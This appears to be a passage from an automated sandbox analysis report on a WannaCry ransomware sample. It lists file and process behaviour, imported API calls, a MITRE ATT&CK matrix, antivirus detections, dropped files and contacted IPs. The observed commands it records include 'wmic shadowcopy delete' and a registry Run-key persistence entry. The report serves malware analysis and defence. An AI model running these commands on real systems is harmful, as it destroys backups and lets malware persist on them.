                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_25-5437
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_29-4667
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_29-5519
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_38-5473
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI coverage: 8.5 %
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\taskdl.exeCode function: 7_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,7_2_00401080
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,25_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,25_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,25_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,29_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,29_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,29_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,38_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,38_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,38_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4857
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4868
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4814
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4692
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_29-4733
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_29-4750
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_29-5467
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_38-5163
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_38-5286
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_38-5262
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_38-5537
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDF307.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDF308.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SDF306.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDF303.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDF304.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SDF305.tmpJump to behavior
                  Source: @WanaDecryptor@.exe, 0000001D.00000003.2974699340.00000000004A8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001D.00000002.2976210018.00000000004A9000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001D.00000003.2974512707.00000000004A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                  Source: @WanaDecryptor@.exe, 00000019.00000002.6617441365.00000000006A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00401BB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,25_2_00401BB0
                  Source: C:\Windows\SysWOW64\cscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,25_2_00406C20
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,29_2_00406C20
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,38_2_00406C20
                  Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,25_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040BED0 #823,GetComputerNameA,GetUserNameA,25_2_0040BED0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,25_2_0040D6A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,29_2_0040D6A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,38_2_0040D6A0

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts12
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		12
                  Scripting                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services12
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Ingress Tool Transfer                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization21
                  Data Encrypted for Impact
                  Default Accounts21
                  Native API                  		1
                  Registry Run Keys / Startup Folder                  		1
                  Access Token Manipulation                  		1
                  Obfuscated Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol1
                  Clipboard Data                  		Exfiltration Over Bluetooth22
                  Encrypted Channel                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                  Inhibit System Recovery
                  Domain Accounts2
                  Command and Scripting Interpreter                  		1
                  Services File Permissions Weakness                  		11
                  Process Injection                  		1
                  Software Packing                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                  Non-Standard Port                  		Exploit SS7 to Track Device LocationObtain Device Cloud Backups1
                  Defacement
                  Local AccountsAt (Windows)Logon Script (Mac)1
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		NTDS23
                  System Information Discovery                  		Distributed Component Object ModelInput CaptureScheduled Transfer2
                  Multi-hop Proxy                  		SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon Script1
                  Services File Permissions Weakness                  		1
                  File Deletion                  		LSA Secrets21
                  Security Software Discovery                  		SSHKeyloggingData Transfer Size Limits1
                  Application Layer Protocol                  		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common11
                  Masquerading                  		Cached Domain Credentials1
                  Process Discovery                  		VNCGUI Input CaptureExfiltration Over C2 Channel2
                  Proxy                  		Jamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Modify Registry                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem1
                  System Owner/User Discovery                  		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                  Process Injection                  		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                  Hidden Files and Directories                  		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                  Services File Permissions Weakness                  		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 795237 Sample: 2N2jefqo8e.exe Startdate: 31/01/2023 Architecture: WINDOWS Score: 100 86 Malicious sample detected (through community Yara rule) 2->86 88 Antivirus detection for dropped file 2->88 90 Antivirus / Scanner detection for submitted sample 2->90 92 10 other signatures 2->92 9 2N2jefqo8e.exe 501 2->9         started        process3 file4 54 C:\Users\user\Downloads\@WanaDecryptor@.exe, PE32 9->54 dropped 56 C:\Users\user\Documents\@WanaDecryptor@.exe, PE32 9->56 dropped 58 C:\Users\user\Desktop\u.wnry, PE32 9->58 dropped 60 224 other malicious files 9->60 dropped 94 Creates files in the recycle bin to hide itself 9->94 96 Drops PE files to the document folder of the user 9->96 98 Writes many files with high entropy 9->98 100 Modifies existing user documents (likely ransomware behavior) 9->100 13 @WanaDecryptor@.exe 14 9->13         started        18 cmd.exe 2 9->18         started        20 cmd.exe 1 9->20         started        22 16 other processes 9->22 signatures5 process6 dnsIp7 80 127.0.0.1 unknown unknown 13->80 64 C:\Users\user\Desktop\TaskData\...\zlib1.dll, PE32 13->64 dropped 66 C:\Users\user\Desktop\TaskData\Tor\tor.exe, PE32 13->66 dropped 68 C:\Users\user\Desktop\...\taskhsvc.exe, PE32 13->68 dropped 72 7 other malicious files 13->72 dropped 102 Detected Wannacry Ransomware 13->102 104 Multi AV Scanner detection for dropped file 13->104 106 Installs TOR (Internet Anonymizer) 13->106 112 3 other signatures 13->112 24 taskhsvc.exe 9 13->24         started        70 C:\Users\user\Desktop\m.vbs, ASCII 18->70 dropped 108 Command shell drops VBS files 18->108 110 Deletes shadow drive data (may be related to ransomware) 18->110 27 cscript.exe 3 18->27         started        30 conhost.exe 18->30         started        32 @WanaDecryptor@.exe 20->32         started        35 conhost.exe 20->35         started        37 conhost.exe 22->37         started        39 conhost.exe 22->39         started        41 conhost.exe 22->41         started        43 reg.exe 22->43         started        file8 signatures9 process10 dnsIp11 74 18.18.82.18, 49850, 9001 MIT-GATEWAYSUS United States 24->74 76 92.205.17.93, 443, 49825, 49853 GD-EMEA-DC-SXB1DE Germany 24->76 78 2 other IPs or domains 24->78 45 conhost.exe 24->45         started        62 C:\Users\user\...\@WanaDecryptor@.exe.lnk, MS 27->62 dropped 82 Deletes shadow drive data (may be related to ransomware) 32->82 84 Uses bcdedit to modify the Windows boot settings 32->84 47 cmd.exe 1 32->47         started        file12 signatures13 process14 signatures15 114 Deletes shadow drive data (may be related to ransomware) 47->114 50 WMIC.exe 1 47->50         started        52 conhost.exe 47->52         started        process16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  2N2jefqo8e.exe100%AviraTR/Ransom.JB
                  2N2jefqo8e.exe93%VirustotalBrowse
                  2N2jefqo8e.exe95%ReversingLabsWin32.Ransomware.WannaCry
                  2N2jefqo8e.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraTR/FileCoder.724645
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%AviraTR/FileCoder.724645
                  C:\@WanaDecryptor@.exe100%AviraLNK/Runner.VPDJ
                  C:\@WanaDecryptor@.exe100%Joe Sandbox ML
                  C:\@WanaDecryptor@.exe100%Joe Sandbox ML
                  C:\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\@WanaDecryptor@.exe91%VirustotalBrowse
                  C:\Users\user\AppData\Local\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\TaskData\Tor\libeay32.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\tor.exe0%ReversingLabs
                  C:\Users\user\Desktop\TaskData\Tor\zlib1.dll0%ReversingLabs
                  C:\Users\user\Desktop\taskdl.exe89%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\taskse.exe89%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Desktop\u.wnry96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Documents\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\user\Downloads\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\Default\Desktop\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry
                  C:\Users\Public\Desktop\@WanaDecryptor@.exe96%ReversingLabsWin32.Ransomware.WannaCry

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  45.0.taskse.exe.400000.0.unpack100%AviraHEUR/AGEN.1246228Download File
                  16.2.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  49.2.taskse.exe.400000.0.unpack100%AviraHEUR/AGEN.1246228Download File
                  16.0.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  43.2.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  43.0.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  18.0.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  0.0.2N2jefqo8e.exe.400000.0.unpack100%AviraTR/Ransom.JBDownload File
                  25.0.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  45.2.taskse.exe.400000.0.unpack100%AviraHEUR/AGEN.1246228Download File
                  18.2.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  7.0.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  21.0.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  24.0.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  50.2.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  29.0.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  38.2.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  37.0.taskse.exe.400000.0.unpack100%AviraHEUR/AGEN.1246228Download File
                  49.0.taskse.exe.400000.0.unpack100%AviraHEUR/AGEN.1246228Download File
                  25.2.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  7.2.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  47.0.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  47.2.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  50.0.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  38.0.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  29.2.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  24.2.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File
                  46.2.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  46.0.@WanaDecryptor@.exe.400000.0.unpack100%AviraHEUR/AGEN.1206061Download File
                  37.2.taskse.exe.400000.0.unpack100%AviraHEUR/AGEN.1246228Download File
                  21.2.taskdl.exe.400000.0.unpack100%AviraHEUR/AGEN.1246154Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://386bsd.net0%Avira URL Cloudsafe
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how0%Avira URL Cloudsafe
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s0%Avira URL Cloudsafe
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how0%VirustotalBrowse
                  https://386bsd.net0%VirustotalBrowse
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s@WanaDecryptor@.exetrue
                  • 0%, Virustotal, Browse
